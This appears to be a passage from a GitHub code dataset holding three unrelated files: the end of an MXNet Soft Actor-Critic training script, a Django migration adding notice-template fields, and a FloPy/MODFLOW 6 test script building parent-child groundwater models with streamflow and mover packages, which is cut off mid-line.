123456)\"\n)\nparser.add_argument(\n \"--batch_size\", type=int, default=256, help=\"batch size (default: 256)\"\n)\nparser.add_argument(\n \"--num_episodes\",\n type=int,\n default=1000,\n help=\"maximum number of episodes (default: 1e3)\",\n)\nparser.add_argument(\n \"--hidden_size\", type=int, default=64, help=\"hidden size (default: 64)\"\n)\nparser.add_argument(\n \"--updates_per_step\",\n type=int,\n default=100,\n help=\"number of updates betweeen actions (default: 1)\",\n)\nparser.add_argument(\n \"--env_steps\",\n type=int,\n default=2500,\n help=\"Maximum number of steps for each episode\"\n)\nparser.add_argument(\n \"--epsilon\",\n type=float,\n default=0.8,\n help=\"ε-greedy exploration factor (default: 0.3)\",\n)\nparser.add_argument(\n \"--start_steps\",\n type=int,\n default=1e4,\n help=\"Steps to enforce random actions (default: 1e4)\",\n)\nparser.add_argument(\n \"--target_update_interval\",\n type=int,\n default=1,\n help=\"Value target update per no. 
of updates per step (default: 1)\",\n)\nparser.add_argument(\n \"--replay_size\", type=int, default=1e6, help=\"size of replay buffer (default: 1e6)\",\n)\nparser.add_argument(\n \"--render\",\n type=int,\n default=0,\n help=\"Render mode [0: disabled, 1: every episode, 2: every evaluation] (default: 0)\",\n)\nparser.add_argument(\n \"--eval_X\",\n type=int,\n default=10,\n help=\"Evaluates a policy a policy every X episodes (default: 10; -1 to disable it)\",\n)\nparser.add_argument(\n \"--verbose\",\n type=int,\n default=1,\n help=\"Set verbosity [0: disabled, 1: every `eval_X` episodes, 2: every episode] (default: 1)\",\n)\nparser.add_argument(\"--gpu\", action=\"store_true\", help=\"run on GPU (default: False)\")\nargs = parser.parse_args()\n\n# Environment\nenv = gym.make(args.env_name)\nenv._max_episode_steps = int(args.env_steps)\n\n# Seed tools\nmxnet.random.seed(args.seed)\nrandom.seed(args.seed)\nenv.seed(args.seed)\n\n# Agent\nagent = SAC(env.observation_space.shape[0], env.action_space, **vars(args))\n\n# TensorboardX\nfilename = \"{}_SAC_{}\".format(\n datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"), args.env_name\n)\nwriter = SummaryWriter(logdir=\"logs/{}\".format(filename))\n\n# Memory buffer\nmemory = MemoryBuffer(args.replay_size)\n\n# Training Loop\ntotal_numsteps = 0\nupdates = 0\n\nfor i_episode in range(args.num_episodes):\n episode_reward = 0\n episode_steps = 0\n done = False\n state = env.reset()\n transitions = list()\n\n while not done:\n p = random.random()\n threshold = args.epsilon + math.exp(-total_numsteps / args.start_steps)\n if p < threshold:\n action = env.action_space.sample() # Sample random action\n else:\n action = agent.select_action(state) # Sample action from policy\n\n if args.render > 1:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n episode_steps += 1\n total_numsteps += 1\n episode_reward += reward\n\n # Ignore the \"done\" signal if it comes from hitting the time horizon mask = (1-d)\n mask = 1 if episode_steps == env._max_episode_steps else int(not done)\n transitions.append((state, action, reward, next_state, mask))\n\n state = next_state\n\n memory.push_bulk(transitions) # Append transition to memory\n if len(memory) > args.batch_size:\n # Number of updates per step in environment\n for i in range(args.updates_per_step):\n # Update parameters of all the networks\n (\n critic_1_loss,\n critic_2_loss,\n policy_loss,\n ent_loss,\n alpha,\n ) = agent.update_parameters(memory, args.batch_size, updates)\n\n writer.add_scalar(\"loss/critic_1\", critic_1_loss, updates)\n writer.add_scalar(\"loss/critic_2\", critic_2_loss, updates)\n writer.add_scalar(\"loss/policy\", policy_loss, updates)\n writer.add_scalar(\"loss/entropy_loss\", ent_loss, updates)\n writer.add_scalar(\"entropy_temprature/alpha\", alpha, updates)\n updates += 1\n\n writer.add_scalar(\"reward/train\", episode_reward, i_episode)\n if args.verbose == 2:\n print(\n \"Episode: {}, total numsteps: {}, episode steps: {}, reward: {}\".format(\n i_episode, total_numsteps, episode_steps, round(episode_reward, 2)\n )\n )\n\n if args.eval_X > 0 and args.verbose > 0:\n if i_episode % args.eval_X == 0 and i_episode > 0:\n state = env.reset()\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(state, eval=True)\n if args.render > 0:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n\n state = next_state\n\n writer.add_scalar(\"avg_reward/test\", episode_reward, i_episode)\n\n 
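# The greedy evaluation above runs a single episode per checkpoint; a sketch\n            # for averaging several episodes instead (n_eval and eval_rewards are\n            # illustrative names, not defined elsewhere in this script):\n            #   avg_reward = sum(eval_rewards) / n_eval\n            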
print(\"----------------------------------------\")\n print(\n \"Test Episodes: {}, Avg. Reward: {}\".format(\n i_episode, round(episode_reward, 2)\n )\n )\n print(\"----------------------------------------\")\n env.close()\n\nagent.save_model(\"saved_models/{}\".format(filename))\n","repo_name":"artur-deluca/sac-mxnet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72727055770","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('restful', '0102_auto_20160823_2223'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='notice',\n name='template',\n field=models.CharField(default='default', unique=True, max_length=255, verbose_name='\\u6a21\\u677f\\u540d\\u79f0'),\n ),\n migrations.AlterField(\n model_name='noticetemplate',\n name='category',\n field=models.CharField(default='', max_length=255, verbose_name='\\u6d88\\u606f\\u6a21\\u677f\\u5206\\u7c7b', choices=[('reward', '\\u4e2d\\u5956\\u6d88\\u606f'), ('signup', '\\u6ce8\\u518c\\u6d88\\u606f'), ('system', '\\u7cfb\\u7edf\\u6d88\\u606f'), ('payment', '\\u652f\\u4ed8\\u6d88\\u606f'), ('confirm', '\\u5546\\u54c1\\u786e\\u8ba4')]),\n ),\n ]\n","repo_name":"bopo/surprise","sub_path":"service/backends/migrations/0103_auto_20160902_1352.py","file_name":"0103_auto_20160902_1352.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"23225995910","text":"import os\nimport numpy as np\nimport shutil\nimport math\nimport targets\n\ntry:\n import flopy\n from flopy.utils.lgrutil import Lgr\nexcept:\n msg = \"Error. 
FloPy package is not available.\\n\"\n msg += \"Try installing using the following command:\\n\"\n msg += \" pip install flopy\"\n raise Exception(msg)\n\nfrom framework import testing_framework\nfrom simulation import Simulation\n\nmf6exe = os.path.abspath(targets.target_dict[\"mf6\"])\n\nname = \"gwf\"\nmvr_scens = [\"mltmvr\", \"mltmvr5050\", \"mltmvr7525\"]\nws = os.path.join(\"temp\", name)\nexdirs = [ws]\nsim_workspaces = []\ngwf_names = []\n\n# ----------------\n# Universal input\n# ----------------\nnumdays = 1\nperlen = [1] * numdays\nnper = len(perlen)\nnstp = [1] * numdays\ntsmult = [1.0] * numdays\n\nicelltype = [1, 0, 0]\n\n# Aquifer properties\nhk = 1\nk33 = 1\n\n# Solver settings\nnouter, ninner = 100, 300\nhclose, rclose, relax = 1e-6, 1e-6, 0.97\n\n# ------------------------------------------\n# Static input associated with parent model\n# ------------------------------------------\nnlayp = 3\nnrowp = 15\nncolp = 15\ndelrp = 1544.1 / ncolp\ndelcp = 1029.4 / nrowp\nx = [round(x, 3) for x in np.linspace(50.0, 45.0, ncolp)]\ntopp = np.repeat(x, nrowp).reshape((15, 15)).T\nz = [round(z, 3) for z in np.linspace(50.0, 0.0, nlayp + 1)]\nbotmp = [topp - z[len(z) - 2], topp - z[len(z) - 3], topp - z[0]]\nidomainp = np.ones((nlayp, nrowp, ncolp), dtype=np.int32)\n# Zero out where the child grid will reside\nidomainp[0:2, 6:11, 2:8] = 0\n\n\n# ------------------------------------------\n# Common SFR data for all parent models\n# ------------------------------------------\n\n# Package_data information\nsfrcells = [\n (0, 0, 1),\n (0, 1, 1),\n (0, 2, 1),\n (0, 2, 2),\n (0, 3, 2),\n (0, 4, 2),\n (0, 4, 3),\n (0, 5, 3),\n (0, 8, 8),\n (0, 8, 9),\n (0, 8, 10),\n (0, 8, 11),\n (0, 7, 11),\n (0, 7, 12),\n (0, 6, 12),\n (0, 6, 13),\n (0, 6, 14),\n (0, 5, 14),\n]\nrlen = [\n 65.613029,\n 72.488609,\n 81.424789,\n 35.850410,\n 75.027390,\n 90.887520,\n 77.565651,\n 74.860397,\n 120.44695,\n 112.31332,\n 109.00368,\n 91.234566,\n 67.486000,\n 24.603355,\n 97.547943,\n 104.97595,\n 8.9454498,\n 92.638367,\n]\nrwid = 5\nrgrd1 = 0.12869035e-02\nrgrd2 = 0.12780087e-02\nrbtp = [\n 49.409676,\n 49.320812,\n 49.221775,\n 49.146317,\n 49.074970,\n 48.968212,\n 48.859821,\n 48.761742,\n 45.550678,\n 45.401943,\n 45.260521,\n 45.132568,\n 45.031143,\n 44.972298,\n 44.894241,\n 44.764832,\n 44.692032,\n 44.627121,\n]\nrbth = 1.5\nrbhk = 0.1\nman = 0.04\nustrf = 1.0\nndv = 0\n\n# -----------------------------------------------\n# Child model SFR data (common to all scenarios)\n# -----------------------------------------------\nconnsc = []\nfor i in np.arange(89):\n if i == 0:\n connsc.append((i, -1 * (i + 1)))\n elif i == 88:\n connsc.append((i, i - 1))\n else:\n connsc.append((i, i - 1, -1 * (i + 1)))\n\n# Package_data information\nsfrcellsc = [\n (0, 0, 3),\n (0, 1, 3),\n (0, 1, 2),\n (0, 2, 2),\n (0, 2, 1),\n (0, 3, 1),\n (0, 4, 1),\n (0, 5, 1),\n (0, 6, 1),\n (0, 7, 1),\n (0, 7, 2),\n (0, 7, 3),\n (0, 7, 4),\n (0, 6, 4),\n (0, 5, 4),\n (0, 4, 4),\n (0, 3, 4),\n (0, 3, 5),\n (0, 3, 6),\n (0, 4, 6),\n (0, 4, 7),\n (0, 5, 7),\n (0, 5, 8),\n (0, 6, 8),\n (0, 7, 8),\n (0, 7, 7),\n (0, 8, 7),\n (0, 8, 6),\n (0, 8, 5),\n (0, 8, 4),\n (0, 9, 4),\n (0, 9, 3),\n (0, 10, 3),\n (0, 11, 3),\n (0, 12, 3),\n (0, 13, 3),\n (0, 13, 4),\n (0, 14, 4),\n (0, 14, 5),\n (0, 14, 6),\n (0, 13, 6),\n (0, 13, 7),\n (0, 12, 7),\n (0, 11, 7),\n (0, 11, 8),\n (0, 10, 8),\n (0, 9, 8),\n (0, 8, 8),\n (0, 7, 8),\n (0, 7, 9),\n (0, 6, 9),\n (0, 5, 9),\n (0, 4, 9),\n (0, 3, 9),\n (0, 2, 9),\n (0, 2, 10),\n (0, 1, 10),\n (0, 0, 10),\n 
(0, 0, 11),\n (0, 0, 12),\n (0, 0, 13),\n (0, 1, 13),\n (0, 2, 13),\n (0, 3, 13),\n (0, 4, 13),\n (0, 5, 13),\n (0, 6, 13),\n (0, 6, 12),\n (0, 7, 12),\n (0, 8, 12),\n (0, 9, 12),\n (0, 10, 12),\n (0, 11, 12),\n (0, 12, 12),\n (0, 12, 13),\n (0, 13, 13),\n (0, 13, 14),\n (0, 13, 15),\n (0, 12, 15),\n (0, 11, 15),\n (0, 10, 15),\n (0, 10, 16),\n (0, 9, 16),\n (0, 9, 15),\n (0, 8, 15),\n (0, 7, 15),\n (0, 6, 15),\n (0, 6, 16),\n (0, 6, 17),\n]\n\nrlenc = [\n 24.637711,\n 31.966246,\n 26.376442,\n 11.773884,\n 22.921772,\n 24.949730,\n 23.878050,\n 23.190311,\n 24.762365,\n 24.908625,\n 34.366299,\n 37.834534,\n 6.7398176,\n 25.150850,\n 22.888292,\n 24.630053,\n 24.104542,\n 35.873375,\n 20.101446,\n 35.636936,\n 39.273537,\n 7.8477302,\n 15.480835,\n 22.883194,\n 6.6126003,\n 31.995899,\n 9.4387379,\n 35.385513,\n 35.470993,\n 23.500074,\n 18.414469,\n 12.016913,\n 24.691732,\n 23.105467,\n 23.700483,\n 19.596104,\n 5.7555680,\n 34.423119,\n 36.131992,\n 7.4424477,\n 35.565659,\n 1.6159637,\n 32.316132,\n 20.131876,\n 6.5242062,\n 25.575630,\n 25.575630,\n 24.303566,\n 1.9158504,\n 21.931326,\n 23.847176,\n 23.432203,\n 23.248718,\n 23.455051,\n 15.171843,\n 11.196334,\n 34.931976,\n 4.4492774,\n 36.034172,\n 38.365566,\n 0.8766859,\n 30.059759,\n 25.351671,\n 23.554117,\n 24.691738,\n 26.074226,\n 13.542957,\n 13.303432,\n 28.145079,\n 24.373089,\n 23.213642,\n 23.298107,\n 24.627758,\n 27.715137,\n 1.7645065,\n 39.549232,\n 37.144009,\n 14.943290,\n 24.851254,\n 23.737432,\n 15.967736,\n 10.632832,\n 11.425938,\n 20.009295,\n 24.641207,\n 27.960585,\n 4.6452723,\n 36.717735,\n 34.469074,\n]\nrwidc = 5\nrgrdc = 0.14448310e-02\nrbtpc = [\n 48.622822,\n 48.581932,\n 48.539783,\n 48.512222,\n 48.487160,\n 48.452576,\n 48.417301,\n 48.383297,\n 48.348656,\n 48.312775,\n 48.269951,\n 48.217793,\n 48.185593,\n 48.162552,\n 48.127850,\n 48.093521,\n 48.058315,\n 48.014984,\n 47.974548,\n 47.934284,\n 47.880165,\n 47.846127,\n 47.829273,\n 47.801556,\n 47.780251,\n 47.752357,\n 47.722424,\n 47.690044,\n 47.638855,\n 47.596252,\n 47.565975,\n 47.543991,\n 47.517471,\n 47.482941,\n 47.449127,\n 47.417850,\n 47.399536,\n 47.370510,\n 47.319538,\n 47.288059,\n 47.256992,\n 47.230129,\n 47.205616,\n 47.167728,\n 47.148472,\n 47.125282,\n 47.088329,\n 47.052296,\n 47.033356,\n 47.016129,\n 46.983055,\n 46.948902,\n 46.915176,\n 46.881439,\n 46.853535,\n 46.834484,\n 46.801159,\n 46.772713,\n 46.743465,\n 46.689716,\n 46.661369,\n 46.639019,\n 46.598988,\n 46.563660,\n 46.528805,\n 46.492130,\n 46.463512,\n 46.444118,\n 46.414173,\n 46.376232,\n 46.341858,\n 46.308254,\n 46.273632,\n 46.235821,\n 46.214523,\n 46.184677,\n 46.129272,\n 46.091644,\n 46.062897,\n 46.027794,\n 45.999111,\n 45.979897,\n 45.963959,\n 45.941250,\n 45.908993,\n 45.870995,\n 45.847439,\n 45.817558,\n 45.766132,\n]\nrbthc = 1.5\nrbhkc = 0.1\nmanc = 0.04\nustrfc = 1.0\nndvc = 0\n\n\n# ---------------------------------------------------\n# Scenario specific parent model SFR connection data\n# ---------------------------------------------------\nconnsp_base = [\n (0, -1),\n (1, 0, -2),\n (2, 1, -3),\n (3, 2, -4),\n (4, 3, -5),\n (5, 4, -6),\n (6, 5, -7),\n (7, 6),\n (8, -9),\n (9, 8, -10),\n (10, 9, -11),\n (11, 10, -12),\n (12, 11, -13),\n (13, 12, -14),\n (14, 13, -15),\n (15, 14, -16),\n (16, 15, -17),\n (17, 16),\n]\n\nconnsp_mvr = [\n (0, -1),\n (1, 0, -2),\n (2, 1, -3),\n (3, 2, -4),\n (4, 3, -5),\n (5, 4, -6),\n (6, 5, -7),\n (7, 6),\n (8, -9),\n (9, 8, -10),\n (10, 9, -11),\n (11, 10, -12),\n (12, 11, -13),\n (13, 12, -14),\n 
(14, 13, -15),\n (15, 14),\n (16, -17),\n (17, 16),\n]\n\nscen_conns = [connsp_base, connsp_mvr, connsp_mvr]\n\n# ---------------------------------------------------\n# Scenario specific MVR connection data\n# (for simulation- and gwf-level MVRs)\n# ---------------------------------------------------\n# parent model gwf mvr\n# static data\nmvrpack = [[\"WEL-1\"], [\"SFR-parent\"]]\nmaxpackages = len(mvrpack)\nmaxmvr = 10\n\n# scenario specific data\nparent_mvr_frac = [None, 0.50, 0.75]\n\n\ndef get_parent_mvr_info(frac):\n # return the appropriate mvr info for the current scenario\n mvrperioddata = [(\"WEL-1\", 0, \"SFR-parent\", 10, \"FACTOR\", 1.0)]\n if frac is not None:\n mvrperioddata.append(\n (\"SFR-parent\", 15, \"SFR-parent\", 16, \"FACTOR\", frac)\n )\n\n mvrspd = {0: mvrperioddata}\n\n return mvrspd\n\n\n# child model gwf mvr_scen\nmvrpackc = [[\"WEL-2\"], [\"SFR-child\"]]\nmaxpackagesc = len(mvrpackc)\nmvrperioddatac = [(\"WEL-2\", 0, \"SFR-child\", 53, \"FACTOR\", 1.0)]\nmvrspdc = {0: mvrperioddatac}\n\n\n# simulation mvr\ndef generate_parentmod_sfr_input(conns):\n pkdat = []\n for i in np.arange(len(rlen)):\n if i < 8:\n rgrd = rgrd1\n else:\n rgrd = rgrd2\n\n cln_list = len(\n [itm for itm in conns[i] if itm is not None and itm is not np.nan]\n )\n ncon = cln_list - 1\n pkdat.append(\n (\n i,\n sfrcells[i],\n rlen[i],\n rwid,\n rgrd,\n rbtp[i],\n rbth,\n rbhk,\n man,\n ncon,\n ustrf,\n ndv,\n )\n )\n\n return pkdat\n\n\ndef generate_childmod_sfr_input():\n pkdatc = []\n for i in np.arange(len(rlenc)):\n cln_list = len(\n [itm for itm in connsc[i] if itm is not None and itm is not np.nan]\n )\n nconc = cln_list - 1\n pkdatc.append(\n (\n i,\n sfrcellsc[i],\n rlenc[i],\n rwidc,\n rgrdc,\n rbtpc[i],\n rbthc,\n rbhkc,\n manc,\n nconc,\n ustrfc,\n ndvc,\n )\n )\n\n return pkdatc\n\n\ndef instantiate_base_simulation(scen_nam, gwfname, gwfnamec):\n # All pckgs between 3 test models the same except for parent model SFR input\n # static model data\n scen_ws = ws + \"-\" + scen_nam\n sim_workspaces.append(scen_ws)\n gwf_names.append(gwfname)\n sim = flopy.mf6.MFSimulation(\n sim_name=name,\n version=\"mf6\",\n exe_name=mf6exe,\n sim_ws=scen_ws,\n continue_=False,\n )\n\n # Instantiate time discretization package\n tdis_rc = []\n for i in range(len(perlen)):\n tdis_rc.append((perlen[i], nstp[i], tsmult[i]))\n\n tdis = flopy.mf6.ModflowTdis(\n sim, time_units=\"DAYS\", nper=nper, perioddata=tdis_rc\n )\n\n # Instantiate the gwf model (parent model)\n gwf = flopy.mf6.ModflowGwf(\n sim,\n modelname=gwfname,\n save_flows=True,\n newtonoptions=\"NEWTON\",\n model_nam_file=\"{}.nam\".format(gwfname),\n )\n\n # Create iterative model solution and register the gwf model with it\n imsgwf = flopy.mf6.ModflowIms(\n sim,\n print_option=\"SUMMARY\",\n outer_dvclose=hclose,\n outer_maximum=nouter,\n under_relaxation=\"NONE\",\n inner_maximum=ninner,\n inner_dvclose=hclose,\n rcloserecord=rclose,\n linear_acceleration=\"BICGSTAB\",\n scaling_method=\"NONE\",\n reordering_method=\"NONE\",\n relaxation_factor=relax,\n filename=\"{}.ims\".format(gwfname),\n )\n sim.register_ims_package(imsgwf, [gwf.name])\n\n # Instantiate the discretization package\n dis = flopy.mf6.ModflowGwfdis(\n gwf,\n nlay=nlayp,\n nrow=nrowp,\n ncol=ncolp,\n delr=delrp,\n delc=delcp,\n top=topp,\n botm=botmp,\n idomain=idomainp,\n filename=\"{}.dis\".format(gwfname),\n )\n\n # Instantiate initial conditions package\n strt = [topp - 0.25, topp - 0.25, topp - 0.25]\n ic = flopy.mf6.ModflowGwfic(\n gwf, strt=strt, 
filename=\"{}.ic\".format(gwfname)\n )\n\n # Instantiate node property flow package\n npf = flopy.mf6.ModflowGwfnpf(\n gwf,\n save_flows=False,\n alternative_cell_averaging=\"AMT-LMK\",\n icelltype=icelltype,\n k=hk,\n k33=k33,\n save_specific_discharge=False,\n filename=\"{}.npf\".format(gwfname),\n )\n\n # output control\n oc = flopy.mf6.ModflowGwfoc(\n gwf,\n budget_filerecord=\"{}.bud\".format(gwfname),\n head_filerecord=\"{}.hds\".format(gwfname),\n headprintrecord=[(\"COLUMNS\", 10, \"WIDTH\", 15, \"DIGITS\", 6, \"GENERAL\")],\n saverecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n printrecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n )\n\n # Instantiate constant head package\n rowList = np.arange(0, nrowp).tolist()\n layList = np.arange(0, nlayp).tolist()\n chdspd_left = []\n chdspd_right = []\n\n # Loop through rows, the left & right sides will appear in separate,\n # dedicated packages\n hd_left = 49.75\n hd_right = 44.75\n for l in layList:\n for r in rowList:\n # first, do left side of model\n chdspd_left.append([(l, r, 0), hd_left])\n # finally, do right side of model\n chdspd_right.append([(l, r, ncolp - 1), hd_right])\n\n chdspd = {0: chdspd_left}\n chd1 = flopy.mf6.modflow.mfgwfchd.ModflowGwfchd(\n gwf,\n maxbound=len(chdspd),\n stress_period_data=chdspd,\n save_flows=False,\n pname=\"CHD-1\",\n filename=\"{}.chd1.chd\".format(gwfname),\n )\n chdspd = {0: chdspd_right}\n chd2 = flopy.mf6.modflow.mfgwfchd.ModflowGwfchd(\n gwf,\n maxbound=len(chdspd),\n stress_period_data=chdspd,\n save_flows=False,\n pname=\"CHD-2\",\n filename=\"{}.chd2.chd\".format(gwfname),\n )\n\n welspd_mf6 = []\n # [(layer, row, column), flow]\n welspd_mf6.append([(3 - 1, 8 - 1, 10 - 1), -5.0])\n wel_mf6_spd = {0: welspd_mf6}\n maxbound = len(welspd_mf6)\n wel = flopy.mf6.ModflowGwfwel(\n gwf,\n print_input=False,\n print_flows=True,\n maxbound=maxbound,\n mover=True,\n auto_flow_reduce=0.1,\n stress_period_data=wel_mf6_spd, # wel_spd established in the MVR setup\n boundnames=False,\n save_flows=True,\n pname=\"WEL-1\",\n filename=\"{}.wel\".format(gwfname),\n )\n\n # ---------------------------\n # Now work on the child grid\n # ---------------------------\n ncpp = 3\n ncppl = [3, 3, 0]\n\n lgr = Lgr(\n nlayp,\n nrowp,\n ncolp,\n delrp,\n delcp,\n topp,\n botmp,\n idomainp,\n ncpp=ncpp,\n ncppl=ncppl,\n xllp=0.0,\n yllp=0.0,\n )\n\n # Get child grid info:\n delrc, delcc = lgr.get_delr_delc()\n idomainc = lgr.get_idomain() # child idomain\n topc, botmc = lgr.get_top_botm() # top/bottom of child grid\n\n # Instantiate the gwf model (child model)\n gwfc = flopy.mf6.ModflowGwf(\n sim,\n modelname=gwfnamec,\n save_flows=True,\n newtonoptions=\"NEWTON\",\n model_nam_file=\"{}.nam\".format(gwfnamec),\n )\n\n # Instantiate the discretization package\n child_dis_shp = lgr.get_shape()\n nlayc = child_dis_shp[0]\n nrowc = child_dis_shp[1]\n ncolc = child_dis_shp[2]\n disc = flopy.mf6.ModflowGwfdis(\n gwfc,\n nlay=nlayc,\n nrow=nrowc,\n ncol=ncolc,\n delr=delrc,\n delc=delcc,\n top=topc,\n botm=botmc,\n idomain=idomainc,\n filename=\"{}.dis\".format(gwfnamec),\n )\n\n # Instantiate initial conditions package\n strtc = [\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n topc - 0.25,\n ]\n icc = flopy.mf6.ModflowGwfic(\n gwfc, strt=strtc, filename=\"{}.ic\".format(gwfnamec)\n )\n\n # Instantiate node property flow package\n icelltypec = [1, 0, 0, 0, 0, 0]\n npfc = flopy.mf6.ModflowGwfnpf(\n gwfc,\n save_flows=False,\n alternative_cell_averaging=\"AMT-LMK\",\n 
icelltype=icelltypec,\n k=hk,\n k33=k33,\n save_specific_discharge=False,\n filename=\"{}.npf\".format(gwfnamec),\n )\n\n # output control\n occ = flopy.mf6.ModflowGwfoc(\n gwfc,\n budget_filerecord=\"{}.bud\".format(gwfnamec),\n head_filerecord=\"{}.hds\".format(gwfnamec),\n headprintrecord=[(\"COLUMNS\", 10, \"WIDTH\", 15, \"DIGITS\", 6, \"GENERAL\")],\n saverecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n printrecord=[(\"HEAD\", \"LAST\"), (\"BUDGET\", \"LAST\")],\n )\n\n welspd_mf6c = []\n # [(layer, row, column), flow]\n welspd_mf6c.append([(6 - 1, 4 - 1, 9 - 1), -10.0])\n wel_mf6_spdc = {0: welspd_mf6c}\n maxboundc = len(welspd_mf6c)\n welc = flopy.mf6.ModflowGwfwel(\n gwfc,\n print_input=False,\n print_flows=True,\n maxbound=maxboundc,\n mover=True,\n auto_flow_reduce=0.1,\n stress_period_data=wel_mf6_spdc, # wel_spd established in the MVR setup\n boundnames=False,\n save_flows=True,\n pname=\"WEL-2\",\n filename=\"{}.wel\".format(gwfnamec),\n )\n\n # exchange data\n exchange_data = lgr.get_exchange_data()\n\n # Establish GWF-GWF exchange\n gwfgwf = flopy.mf6.ModflowGwfgwf(\n sim,\n exgtype=\"GWF6-GWF6\",\n print_flows=True,\n print_input=True,\n exgmnamea=gwfname,\n exgmnameb=gwfnamec,\n nexg=len(exchange_data),\n exchangedata=exchange_data,\n mvr_filerecord=\"{}.mvr\".format(name),\n pname=\"EXG-1\",\n filename=\"{}.exg\".format(name),\n )\n\n return sim, gwf, gwfc\n\n\ndef add_parent_sfr(gwf, gwfname, conns):\n # Instatiate a scenario-specific sfr package\n pkdat = generate_parentmod_sfr_input(conns)\n sfrspd = {0: [[0, \"INFLOW\", 40.0]]}\n sfr = flopy.mf6.ModflowGwfsfr(\n gwf,\n print_stage=False,\n print_flows=True,\n budget_filerecord=gwfname + \".sfr.bud\",\n save_flows=True,\n mover=True,\n pname=\"SFR-parent\",\n unit_conversion=86400.00,\n boundnames=False,\n nreaches=len(conns),\n packagedata=pkdat,\n connectiondata=conns,\n perioddata=sfrspd,\n filename=\"{}.sfr\".format(gwfname),\n )\n\n\ndef add_child_sfr(gwfc, gwfnamec):\n # Instantiate child model sfr package (same for all scenarios)\n pkdatc = generate_childmod_sfr_input()\n sfrspd = {0: [[0, \"INFLOW\", 0.0]]}\n sfrc = flopy.mf6.ModflowGwfsfr(\n gwfc,\n print_stage=False,\n print_flows=True,\n budget_filerecord=gwfnamec + \".sfr.bud\",\n save_flows=True,\n mover=True,\n pname=\"SFR-child\",\n unit_conversion=86400.00,\n boundnames=False,\n nreaches=len(connsc),\n packagedata=pkdatc,\n connectiondata=connsc,\n perioddata=sfrspd,\n filename=\"{}.sfr\".format(gwfnamec),\n )\n\n\ndef add_parent_mvr(gwf, gwfname, frac):\n # get scenario specific mvr data\n mvrspd = get_parent_mvr_info(frac)\n mvr = flopy.mf6.ModflowGwfmvr(\n gwf,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackages,\n packages=mvrpack,\n perioddata=mvrspd,\n budget_filerecord=gwfname + \".mvr.bud\",\n filename=\"{}.mvr\".format(gwfname),\n )\n\n\ndef add_child_mvr(gwfc, gwfnamec):\n mvrc = flopy.mf6.ModflowGwfmvr(\n gwfc,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackagesc,\n packages=mvrpackc,\n perioddata=mvrspdc,\n budget_filerecord=gwfnamec + \".mvr.bud\",\n filename=\"{}.mvr\".format(gwfnamec),\n )\n\n\ndef add_sim_mvr(sim, gwfname, gwfnamec, remaining_frac=None):\n # simulation-level mvr data\n mvrpack_sim = [[gwfname, \"SFR-parent\"], [gwfnamec, \"SFR-child\"]]\n maxpackages_sim = len(mvrpack_sim)\n\n # Set up static SFR-to-SFR connections that remain fixed for entire simulation\n if remaining_frac is not None:\n sim_mvr_perioddata = [ # don't forget to use 0-based values\n [\n mvrpack_sim[0][0],\n 
mvrpack_sim[0][1],\n 7,\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 0,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 88,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 8,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 15,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 16,\n \"FACTOR\",\n remaining_frac,\n ],\n ]\n else:\n sim_mvr_perioddata = [ # don't forget to use 0-based values\n [\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 7,\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 0,\n \"FACTOR\",\n 1.00,\n ],\n [\n mvrpack_sim[1][0],\n mvrpack_sim[1][1],\n 88,\n mvrpack_sim[0][0],\n mvrpack_sim[0][1],\n 8,\n \"FACTOR\",\n 1.00,\n ],\n ]\n\n mvrspd = {0: sim_mvr_perioddata}\n maxmvr = 3\n mvr = flopy.mf6.ModflowMvr(\n sim,\n modelnames=True,\n maxmvr=maxmvr,\n print_flows=True,\n maxpackages=maxpackages,\n packages=mvrpack_sim,\n perioddata=mvrspd,\n filename=\"{}.mvr\".format(name),\n )\n\n\ndef build_and_run_simulations():\n for idx, (scen_nm, conns, frac) in enumerate(\n zip(mvr_scens, scen_conns, parent_mvr_frac)\n ):\n scen_nm_parent = name + \"_\" + scen_nm + \"_p\"\n scen_nm_child = name + \"_\" + scen_nm + \"_c\"\n sim, gwf, gwfc = instantiate_base_simulation(\n mvr_scens[idx], scen_nm_parent, scen_nm_child\n )\n # add the sfr packages\n add_parent_sfr(gwf, scen_nm_parent, conns)\n add_child_sfr(gwfc, scen_nm_child)\n # add the mover packages (simulation level and gwf level)\n add_parent_mvr(gwf, scen_nm_parent, frac)\n add_child_mvr(gwfc, scen_nm_child)\n if frac is not None:\n add_sim_mvr(sim, scen_nm_parent, scen_nm_child, 1 - frac)\n else:\n add_sim_mvr(sim, scen_nm_parent, scen_nm_child)\n\n sim.write_simulation()\n\n # Run the simulation\n success, buff = sim.run_simulation(silent=False)\n if not success:\n print(buff)\n\n return success\n\n\ndef check_simulation_output():\n parent_sfr_last_reach_flow = []\n parent_sfr_mvr_amount = []\n sim_mvr_amount = []\n gwf_srch_str1 = (\n \" SFR-PARENT PACKAGE - SUMMARY OF FLOWS FOR EACH CONTROL VOLUME\"\n )\n gwf_srch_str2 = \" WATER 